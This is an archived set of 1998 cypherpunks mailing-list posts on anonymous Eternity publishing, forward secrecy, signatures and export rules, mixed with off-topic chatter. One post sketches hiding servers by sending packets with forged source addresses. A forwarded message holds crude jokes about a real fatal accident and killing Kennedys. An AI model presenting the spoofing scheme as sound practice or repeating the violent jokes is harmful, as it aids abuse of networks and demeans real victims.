                   .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
 ..sys|net.admin....                                                 .
 .                     the university computer center            .....
 ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNL/2AQJjTpK3AXhBAQHJMgQAoPZfME2lyEm29ipy8CMGmt32RXhERF0D
1WyEMP+dxkcDb8LkgYwPYZZp8pAEac2Qd8puET3S6tJajj452TEPelfyKeKfMFva
yFyWowFBON+R2AJT1HMXL2ArevRqTpbKD3mdjZ/qtWBbEf8Dh+gNoU0E+CoTbiEq
0lgp0nIrW9o=
=I5Jy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 07:40:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Where for lunch on Tue.? (fwd)
Message-ID: <199801170006.SAA12970@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 17:25:13 -0600
> From: Kenneth Zuber <kzuber@us.itmasters.com>
> 
> I heard you weren't good either.....
> I guess you get what you pay for
> 
> Sean Starke wrote:
> > 
> > > Tivoleers, be advised...he's looking to pick at least one of you up...
> >   I may be cheap, but I'm not free...

That could explain why every girl he gets dumps him in less than a month...

He's cheap which means he shows up with wilted flowers and day-old bread.
Also explains why he can't keep people out of his crease, he uses them old
dull skates.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 07:39:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Where for lunch on Tue.? (fwd)
Message-ID: <199801170007.SAA13045@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> That could explain why every girl he gets dumps him in less than a month...
> 
> He's cheap which means he shows up with wilted flowers and day-old bread.
> Also explains why he can't keep people out of his crease, he uses them old
> dull skates.

Sorry, that wasn't supposed to go out to you folks....I think I'm about to
get my butt kicked...;(


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owl@owlseye.com
Date: Sat, 17 Jan 1998 07:31:32 +0800
To: cypherpunks@ssz.com
Subject: OK to send e-mail?
Message-ID: <199801162310.SAA11440@ns.owlseye.com>
MIME-Version: 1.0
Content-Type: text/plain



OK to send an e-mail to cypherpunks@ssz.com? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 01:38:36 +0800
To: cypherpunks@cyberpass.net
Subject: Kaczynski attempts suicide
Message-ID: <199801161731.SAA19055@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>      SACRAMENTO, California (AP) -- The judge in Theodore Kaczynski's
>      trial declared him "lucid, calm" and free from signs of mental
>      illness just hours before the Unabomb suspect tried to kill himself
>      in his cell.


I don't get it.  The guy is facing the death penalty, and now they're
trying to keep him alive.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 02:54:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: steganography and delayed release of keys (Re: Eternity Services)
In-Reply-To: <v03102803b0e08ed02241@[207.167.93.63]>
Message-ID: <199801161848.TAA29226@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> wrote:

> Unfortunately good quality textual steganography encodings are I think a
> hard problem for reasonable data rates.  One advantage in our favour is the
> massively noisy and incoherent garbage which forms the majority of USENET
> traffic.  Plausibly mimicing an alt.2600 or warez d00d message, or a
> `cascade' seems like an easier target.

yA, d00d, i g0tz yEr stEg0 dAtA eNcOded r1gh+ h3re... ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Jan 1998 10:12:19 +0800
To: cypherpunks@toad.com
Subject: New Software Controls
Message-ID: <1.5.4.32.19980117020259.00733f54@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



TH points out that there's a broad new provision in the
BXA Wassenaar rule for controlling telecommunications
software under Category 5, Part I - Telecommunications, 
quote:

   You might want to highlight the following section ... not sure of the 
   entire context ... but this isn't something that I'd seen before. It looks
   like control of any software that can transmit data.

       c.3. ``Software'' which provides the capability of recovering
       ``source code'' of telecommunications ``software'' controlled by
       5A001, 5B001, or 5C001;

For the citation see: 

   http://jya.com/bxa-wa/cat51.htm#5D001c3

---------

We've broken the rule into several components for easier
access to the Commerce Control List revisions. See:

   http://jya.com/bxa-wa-rule.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 17 Jan 1998 10:46:19 +0800
To: "Meander-Talk List" <cypherpunks@Algebra.COM>
Subject: Fwd: Skiing
Message-ID: <199801170242.VAA10711@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain




---------------- Begin Forwarded Message ----------------
Date:        01/16  8:27 AM
Received:    01/16  5:18 PM
From:        Patrick McGarvey, mcgoo@worldnet.att.net
To:          Brian Riley, brianbr@together.net
             

 Subject: For the skier in us...
 >
 > What's the difference between John Denver and Michael Kennedy?
 > John Denver made it alive out of Aspen.

 > Has Elton John re-written any of his songs for Michael Kennedy?
 > Not yet, but he's done one about the tree: "I'm Still Standing"

 > How can you be sure that Michael was really a Kennedy?
 > Check the family tree.

 > How will the priest begin Michael Kennedy's eulogy?
 > "We are gathered here together on this slalom occasion...."

 > A simple accident? Some witnesses insist there was a second tree at
 > the snow-covered knoll...

 > What do Michael and JFK Jr's magazine "George" have in common?
 > *     Wood pulp.
 >
 >       New bumper sticker...."Plant A Tree....Kill A Kennedy...."

 >       What's an event you don't want to be at?
 > *     A Michael Kennedy New Year's Bash
 
 > What will it take to reunite the four Kennedy brothers?
 > A1:  One more bullet.
 > A2:  A season lift pass.
 

----------------- End Forwarded Message -----------------




Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "The surest way to corrupt a youth is to instruct him to hold in higher 
regard
  those who think alike than those who think differently." -- Nietzche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 17 Jan 1998 06:33:52 +0800
To: ravage@ssz.com
Subject: reasons for local eternity proxies (Re: remailer resistancs to attack)
In-Reply-To: <199801161517.JAA10130@einstein.ssz.com>
Message-ID: <199801162142.VAA00581@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> > Adam Back:
> > > Public access servers aren't a good idea.  Really people should be
> > > running local access servers only.  The index is local, cache is
> > > local, and USENET is a distributed broadcast medium.
> > 
> > True.
> 
> Where do these private access servers get/send their traffic ultimately?

Local eternity servers get their data from a news feed.  Preferably a
local news feed, or a satellite based feed, or second choice SSL
encrypted NNTP server, third choice NNTP server.

(Reason for local news feed being preferabl is that it protects the
NNTP traffic which would otherwise allow eavesdroppers to observer
which articles you were reading.  SSL is only a partial solution
because you are then trusting the SSL NNTP server operator.) 

Local servers don't generate any traffic, "local server" is really a
misnomer, it is a local proxy for reading news... it presents a view
of USENET articles which makes them appear as web pages.  It keeps
copies of those web pages more up to date versions are read in news,
this allows fast access to the web space.

There is a trade off between update period and size of web space as
the amount of USENET traffic you can generate without annoying people
is limited.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 17 Jan 1998 06:33:47 +0800
To: ravage@ssz.com
Subject: forward secrecy for mixmaster & email (Re: remailer resistancs to attack)
In-Reply-To: <199801161527.JAA10183@einstein.ssz.com>
Message-ID: <199801162154.VAA00662@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> Ryan Lacket <rdl@mit.edu> writes:
> > Traditional law enforcement takes so long to investigate, the keys
> > could be canceled and replaced several times.
> 
> This is another problem with the entire crypto process as now implimented.
> Users of keys, either for encryption or signing, tend to think of the keys
> as long term entities. Considering the increase in computing power, the
> coming ubiquity of law enforcement monitoring on the network, increased
> payoff for hackers as the traffic of personal info increases, and general
> human failure keys should in fact be changed often (say a couple of times a
> year, annualy at least)

Make that instant key changes for mixmaster remailers by using forward
secrecy and direct IP delivery to enable the interactive
communications pattern required for immediate forward secrecy.  Ulf
Moeller (current mixmaster maintainer) has this on his to do list I
think.

Even for email, I spent a lot of time arguing with PGP Inc employees
about how forward secrecy could be obtained within PGP 5.x.  (The
OpenPGP list seems to have gone dead... wonder what is going on.)

The separate encryption and signature keys provided by PGP 5.x /
OpenPGP allow you to have short lived encryption keys, and longer
lived signature keys.  The web of trust is provided by the signature
keys.  PGP 5.x implements automatic key update.  It is cheap to
generate new Elgamal keys every week or day or whatever if you share
the public prime modulus.

You can also opportunistically send use once Elgamal keys in messages
which allows someone to have even more immediate forward secrecy.

In addition you can use interactive forward secrecy between mail hubs,
and you can also authenticate this with PGP's web of trust using a
design I posted to cypherpunks and ietf-open-pgp towards the end of
last year with a subject of something like "PGP WoT authenticated
forward secrecy".

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Sat, 17 Jan 1998 06:28:53 +0800
To: cypherpunks@toad.com
Subject: Eternity - an alternative approach
Message-ID: <19980116220255.3116.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In one of the messages on the eternity thread someone suggested using
radio signals. This is an interesting approach which certainly deserves
further attention but digital radio requires special hardware which I prefer 
to avoid. However, some of the characteristics of radio signals can be 
emulated on the internet.

Radio links are perfect for hiding the location of receivers. The
equivalent for this is of course services like usenet and IRC. Both are
already used for providing anonymity.

Radio is also quite good at hiding the location of the transmitter - you
tune your radio and the signals are just there, coming down your antenna.
It takes special equipment to locate where they originated.

It occured to me that the equivalent on the net would be to receive
packets with invalid source addresses. They are just there, coming dowm
the phone line to your modem. It takes significant resources and snooping
on a massive scale to locate where they are coming from.. All this is
assuming you can find some way to send a request with your address to the
server.

For eternity this means that the location of servers where documents are
stored can be kept secret if they transmit the documents using packets
with invalid source addresses. Receivers of eternity documents will not
be able to tell where they are coming from.

Since there is no bidirectional link between transmitter and receiver the
protocol must be implemented over UDP. To protect against packet loss the
data may be encoded with redundancy. The correction code can be similar
to that used on RAID disk arrays - adding redundant blocks consisting of
XOR of other blocks. Missing blocks can be reconstructed by XORing
together other blocks received.

To provide even better anonymity the transmitter may send the messages
through one or more onion routers which decrypt one layer of encryption.
These routers do not store information, do not know what information
passes through them and do not know where it's coming from. Any packets
they forward are sent without a valid source address. This should make
them less vulnerable to attacks of all kinds. Can anyone speculate about
their liability under US law?

Putting caches on the routers will help both performance and security.
Will it affect their liability in any way?

If encryption is implemented properly all packets will look identical:
blocks of random data of the same size and no source address. This will
make traffic analysis difficult. The distance to the transmitter can be
hidden by initializing the packet's time-to-live field to a value with
random variations.

That was the easy part. The hard part is to get the requests to the
document servers without knowing their addresses. This can be done
through the equivalent of remailer reply blocks or some kind of broadcast
medium.

The reply blocks would be implemented by the onion routers. Each hop
could generate several copies, both for redundancy and as decoys.
Packets used in reply blocks can look identical to packets with document
data, including the use of invalid source addresses.

In the broadcast version clients and servers subscribe to channels with
many participants to hide their identity in the crowd. The system could
use an existing service like IRC or a dedicated network, possibly based
on modified IRC server code.

Sympathizers with bandwidth to spare can subscribe too to provide better
cover for the actual document servers. Servers could listen using trusted
proxies or chains of semi-trusted proxies. The division into channels
allows growth of the system if the total bandwidth of requests becomes
too high.

Using the public IRC networks has the advantages of being less suspicious
and not requiring the deployment of new infrastructure. Requests could
even be hidden steganographically in IRC traffic. Unfortunately, IRC
server operators are touchy about abuse of their systems.

Requests should be small. This allows replicating them to a large number
of receivers without taking too much bandwidth. They can also be made to
be of fixed size and contain no controversial information. Requests
contain the document index as a compact one-way hash, the requester's IP
address and the server's ID code. It may also contain hashcash or ecash
payment. Requests should be encrypted to the server's public key. To keep
them small, elliptic curve encryption may be used.

A server may send random cover packets to hide the correlation between
a request and its response. It may also add random delay before
responding to the request. Delay will also help limit the bandwidth.
Users of eternity need to be more patient that the average web surfer and
the protocol should use generous timeouts. Since UDP has no flow control
the server should always assume the client is using a modem connection
and limit its transmission speed accordingly. Security has a price.

The client software may be implemented as a local web proxy (in Java?)
which identifies requests to eternityspace and converts them to this
protocol. Public gateways may be set up to allow anyone to read eternity
URLs. These public may also be used to protect the anonymity of the
reader like the Anonymizer.

Document servers and routers must be located on networks where there is
no spoofed packet filtering. Since the common use of spoofed packets is
in denial-of-service attacks more and more filters are being installed.
It may become harder in the future to find places to put the servers and
routers. I believe it should always be possible since it is not practical
to implement filtering in places where there is a lot of traffic from
different sources. In cases where the document server is located on a
filtered network it may have to trust the routers to hide its location.

This system is far from perfect: it has too many components and the weakest link is the transmission of requests to servers. I still believe it has some interesting sides which deserve further discussion. Your ideas are welcome.

- -----------------
Kay Ping 
nop 'til you drop

finger kping@nym.alias.net for key
DF 6D 91 18 A6 59 41 96 - 89 01 69 B7 9D0 4 AE 53

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEPAwUBNL26txHPAso8Qp7tAQGLEAfPeRgIL3OqiG67CLBO9TCe/oV5lmw66Pz1
Wl17ajHeSCX6qjACSZ3La73drUjIftL0G/18PkLd48VGmsF6izCnXB4fh8MAB6Ve
QWjhRTvRSkKkwXK4t2tx6CUCdxOaJ9Phd6J02Z+MdjEGJ3jAdUdaHWo5zM5i6Ris
wkgATEhGMpw8tjlnvR4erwu51iSrt62huPWJXl1pjyPfQbl0iyQtcGdQ1spIWLJC
oaOI7QchHK3LjSuzN54MVCjRdz8fiI6JHAUnlqqsW29LBOZQkSnQedORCuIALwqe
qOhSxMKbciLdVde3BBtpILpz5y91ulAecxOOwcnc7m5Pjw==
=iLP5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 17 Jan 1998 06:34:25 +0800
To: gonad99@earthlink.net
Subject: what are cypherpunks about?
In-Reply-To: <199801161822.KAA26360@denmark.it.earthlink.net>
Message-ID: <199801162205.WAA00681@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




[I am keeping this Cc of the list as I have come across 4 or 5 people
in the last month or so, most of who have been readers of the list for
years, but who were not up to date with the fact that cypherpunks list
is not located at toad.com.]

James Little <gonad99@earthlink.net> writes:
> I just don't understand what it is u guys are really about. Please
> help.

First I think you are subscribed to the old list... toad.com only
covers some of the traffic.  See: http://www.dcs.ex.ac.uk/~aba/cp.html
for instructions on subscribing to the current cypherpunks list home.

For what cypherpunks are about, cypherpunks are about crypto-anarchy,
which some thing will long term corrode the power of governments,
needless to say most here also think this would be a good thing.

You should read Tim May's cyphernomicon:

	http://www.oberlin.edu/~brchkind/cyphernomicon/

You might find these books interesting also:

"Snow Crash", Neal Stephenson

"The Moon is a Harsh Mistress", Heinlein

"Machinery of Freedom", David Friedman
2nd Ed.
Paperback
Published by Open Court Publishing Company
Publication date: August 1989
ISBN: 0812690680


People also recommend "True Names" by Vernor Vinge, but I have been
unable to obtain a copy so far.  Perhaps someone could scan it and
post it on the eternity servers.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 05:18:01 +0800
To: cypherpunks@toad.com
Subject: Nanotechnology
Message-ID: <199801162110.WAA17429@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think people here seriously underestimate how long nanotech will take.
Suppose you have a machine which takes atoms and deposits them onto a
surface, building it up layer by layer.  This is possible with today's
technology, but it's a slow process.

Consider this: If someone builds a replicator which takes a week to make
a copy of itself, every person on this entire planet could have one within
eight months.  Think about it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: igor@Algebra.COM (Igor)
Date: Sat, 17 Jan 1998 12:15:15 +0800
To: cypherpunks@www.video-collage.com
Subject: Deriving economic profits from writing FREE software?
Message-ID: <slrn6c0bra.sic.igor@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

At my leisure, I write free software. One of these programs is the usenet
moderation bot STUMP. Right now I am writing another free program. I feel
perfectly comfortable with the idea that I will not CHARGE money for these
programs; for one, I am a beneficiary of a multitude of excellent free
programs written by others, and just as well i realize that selling them 
would be more of a hassle than it is worth.

My another pet idea is that programming is poetry, and therefore a
person who only writes commercial software is almost surely going to
lose whatever gift in programming that he had from God.

However, aside from the psychic benefits, I would like to somehow derive
an economic profit from being a freeware author. So far, I feel that the
status of the author of a popular package does sound good on a resume, but
it is as far as I could get.

Does anyone else feel the same way? Has anybody come up with a way to 
cash in on the free programs that he writes? 

Thank you.
----------------------------------------------------------------------------
char*p="char*p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

                \=/,         _-===-_-====-_-===-_-==========-_-====-_
                |  @___oo   (                                        )_
      /\  /\   / (___,,,}_--=                                          )
     ) /^\) ^\/ _)        =__       Anything is good and useful if    )
     )   /^\/   _)          (_                                        )
     )   _ /  / _)            (                                        )
 /\  )/\/ ||  | )_)            (_       it's made of chocolate.       )
<  >      |(,,) )__)             (                                     )
 ||      /    \)___)\             (_                                 __)
 | \____(      )___) )___           -==-_____-=====-_____-=====-___==
  \______(_______;;; __;;;





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 12:00:02 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Genetic & Tissue Engineering - The Learning Channel
Message-ID: <199801170429.WAA13873@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

FYI

The show that was mentioned the other night regarding tissue and limb
growth was shown tonite on The Learning Channel from 9pm to 10pm central.
If you're interested check your schedule for a repeat.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Sat, 17 Jan 1998 06:48:37 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: non-transferable signatures (Re: Crypto Kong penetration.)
In-Reply-To: <19980116104604.39449@tightrope.demon.co.uk>
Message-ID: <19980116224808.11732@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Jan 16, 1998 at 03:30:05PM +0000, Adam Back typed:

> You can use non-transferable signatures for private email, but it's
> probably better not to sign publically posting messages, unless you
> have a persistent anonymous nym unlinkable with your meat space
> persona.

Hmm this is a very good point which may explain the limited use of PGP
on this list anyway.

I also wonder whether the low uptake of PGP is more due to it being too
hard to use between different mailers and too hard to use generally for
the nontechnical.

SMIME of course despite bad cypherpunk karma is easy and maybe even 
works between mailers.

-- 
Steve Mynott <steve@tightrope.demon.co.uk>               tel: 0956 265761
pgp: 1024/D9C69DF9       88 91 7A 48 40 72 BD AC  4D 71 59 47 01 AC 56 E9

There are only two ways to live your life. One is as though nothing is
a miracle. The other is as though everything is a miracle. --A.  Einstein





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 06:40:02 +0800
To: cypherpunks@toad.com
Subject: Re: I'm going to count to ten...
Message-ID: <199801162225.XAA28511@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



TruthMonger wrote:
>  I also sent a letter a few weeks ago to Ted Kaczynski, offering to
>carry on his work while he is incarcerated. I got a letter back from
>him today, but I'm afraid to open it...

TM,
Do us all a favor--open the letter!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 07:05:23 +0800
To: cypherpunks@ssz.com
Subject: Re: Sun to fight MS w/ new workstations [CNN]
In-Reply-To: <199801130006.SAA24034@einstein.ssz.com>
Message-ID: <199801162300.AAA03770@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>    More related sites... PALO ALTO, Calif.(Reuters) - Sun Microsystems
>    Inc. will launch a new line of workstations Tuesday, aiming to
>    challenge its rivals and blunt the spread into markets for
>    high-powered desktop computers used by engineers of PCs using
>    Microsoft Corp.'s Windows NT.

Hmm...  Considering that you can buy a PC w/ Linux and have a Unix
workstation for less than the cost of a new computer with NT, I wonder
who Sun is really targetting here.

Most of the people buying NT are the same people who bought their last
OS from Microsoft, and don't feel like trying anything new.  Sun's real
problem is that they were charging much more for their computers than
it would cost to put together the parts.  Hence, the drop in demand.

But I suppose 'The evil Microsoft Empire is taking away our customers'
makes for better headlines, even if it is bullshit.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 18 Jan 1998 02:56:39 +0800
To: cypherpunks@cyberpass.net
Subject: call for proposals:  "Media, Democracy and the Public Sphere" inJune 1998
Message-ID: <v0311074fb0e616e58ae8@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



I wonder what these peoples' take on the Internet is?  If the net isn't a
"democratic public sphere", what is?

>Date: Fri, 16 Jan 1998 13:56:01 -0800 (PST)
>Reply-To: cda96-l@willamette.edu
>Originator: cda96-l@willamette.edu
>Sender: cda96-l@willamette.edu
>Precedence: bulk
>From: "T. L. Kelly" <room101@teleport.com>
>To: Multiple recipients of list <cda96-l@willamette.edu>
>Subject: call for proposals:  "Media, Democracy and the Public Sphere" in
>June 1998
>
>The Union for Democratic Communications (UDC) invites participation in
>its next international meeting, June 11-14, 1998, in San Francisco,
>California, addressing the topic "Media, Democracy and the Public
>Sphere."
>
>UDC welcomes papers, audiovisual works, panels, workshops and projects
>that break with traditional, monological approaches, to promote dialogue
>and interaction around questions of critical communications and media
>activism, as suggested below.  Please send proposals for presentations
>by no later than MARCH 1, 1998, to:
>
>        Prof. Bernadette Barker-Plummer
>        1998 UDC Conference Chair
>        Department of Communication
>        University of San Francisco
>        2130 Fulton Street
>        San Francisco, CA 94117
>     email: barkerplum@usfca.edu
>
>The UDC steering committee suggests the following perspectives on the
>conference topic, "Media, Democracy and the Public Sphere":  the mass
>media are flourishing today;  a democratic public sphere is not.  What,
>then, are the possibilities of resolving the conflicts between a "mass"
>media and a "democratic" public sphere?
>
>Facets of this question which participants may wish to address include
>the concept of "the public interest"; the role of public media systems
>in the creation of a democratic public sphere; the role of media policy
>in helping or hindering democracy; the role of media in
>(trans)national"democratization" processes; the dissemination of radical
>claims through alternative, community and mainstream media; the ways in
>which the everyday media practices of the public help or hinder the
>creation of a democratic public sphere; the education of media workers
>in the interest of democracy; and the utilization of information
>technolgies for and against democracy.
>
>The host institution is arranging affordable conference housing on the
>campus of the University of San Francisco, which, however, requires
>timely registration.  Please send in your proposal early to faciliate
>rapid notification of acceptances in early March!  The San Francisco
>host committee is also scheduling plenary sessions with featured
>speakers and joint evening outings into the city.  This promises to be
>an very engaged and productive gathering of international media
>activists, practitioners, theorists and historians. Please contact Prof.
>Barker-Plummer, conference chair, with any questions:
>     barkerplum@usfca.edu
>

-------------------------------------------------------------------------
Bill Frantz       |                            | Periwinkle -- Consulting
(408)356-8506     | All politicians should ski.| 16345 Englewood Ave.
frantz@netcom.com |                            | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Jan 1998 07:47:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Eternity Services
In-Reply-To: <199801120523.AAA12947@the-great-machine.mit.edu>
Message-ID: <199801162343.AAA12152@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@cypherpunks.to> wrote:

> And the demand for such ecash systems is real. I personally carried a $10
> million offer for a non-exclusive license for the blind signature patent
> to David Chaum. He declined the offer. "The patent is not for license".
> DigiCash's CEO since March of last year, Mike Nash, also told me that
> DigiCash was not considering licensing the patent. I knew that day that it
> was time to quit. Not surprisingly, nobody heard from DigiCash since.

You could challenge the patent, and probably win, for less than $10
million.  There is quite a bit of prior art that Chaum neglected to
disclose, especially a certain incident where Chaum, as editor of
Crypto '84 proceedings, tried to supress part of ElGamal's paper which
discussed 'signature conversion' (aka blind signatures).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 18 Jan 1998 03:57:23 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Kaczynski attempts suicide
In-Reply-To: <199801161731.SAA19055@basement.replay.com>
Message-ID: <Pine.BSF.3.91.980117004353.15705A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




May have been a fake attempt to push the insanity defense along.

On Fri, 16 Jan 1998, Anonymous wrote:

> >      SACRAMENTO, California (AP) -- The judge in Theodore Kaczynski's
> >      trial declared him "lucid, calm" and free from signs of mental
> >      illness just hours before the Unabomb suspect tried to kill himself
> >      in his cell.
> 
> 
> I don't get it.  The guy is facing the death penalty, and now they're
> trying to keep him alive.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 18 Jan 1998 02:45:46 +0800
To: ravage@ssz.com
Subject: Re: non-transferable signatures (Re: Crypto Kong penetration.) (fwd)
In-Reply-To: <199801162319.RAA12288@einstein.ssz.com>
Message-ID: <199801170202.CAA00371@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> Adam Back <aba@dcs.ex.ac.uk> writes:
> > when for example the USG adds cypherpunks to it's growing list of
> > terrorist organisations.
> 
> We're an 'organization'? Where is my monthly newsletter?....;)

There are a bunch of people subscribed to a mailing list called
cypherpunks.  There is no organisation, this is an anarchy, as can be
readily observed :-) I only used `list of terrorist organisations'
because I think that is the US government term for their little black
list.

> In general I have to agree with Adam though, in the real world with
> ubiquitous and surreptitious monitoring signing documents is actualy a
> liability in many if not most cases. About the only exception is dealing
> with a contractual relationship.

Even for contracts I think you would be better off not connecting to
your meat space persona if you could help it.  eg. Use a nym, post a
bond with a high reputation cyberspacial arbitration service, use
designated verifier non transferable signatures to allow the
arbitration service and other party to the transaction to verify your
signature, but to make the signature non-transferable to other
parties.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sun, 18 Jan 1998 03:00:50 +0800
To: cypherpunks@toad.com
Subject: Re: Nanotechnology
In-Reply-To: <199801162110.WAA17429@basement.replay.com>
